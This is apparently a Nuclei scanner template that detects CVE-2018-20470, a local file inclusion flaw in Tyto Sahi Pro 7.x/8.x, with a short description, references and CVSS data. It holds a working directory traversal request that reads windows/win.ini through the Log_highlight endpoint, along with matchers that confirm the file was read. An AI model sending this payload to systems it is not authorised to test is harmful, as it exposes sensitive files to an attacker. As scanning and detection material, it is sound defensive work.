40 lines
1.1 KiB
YAML
40 lines
1.1 KiB
YAML
id: CVE-2018-20470
|
|
|
|
info:
|
|
name: Tyto Sahi pro 7.x/8.x - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: |
|
|
Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files.
|
|
reference:
|
|
- https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/
|
|
- http://packetstormsecurity.com/files/153330/Sahi-Pro-7.x-8.x-Directory-Traversal.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-20470
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2018-20470
|
|
cwe-id: CWE-22
|
|
tags: cve,cve2018,lfi,packetstorm
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "bit app support"
|
|
- "fonts"
|
|
- "extensions"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# Enhanced by mp on 2022/06/17
|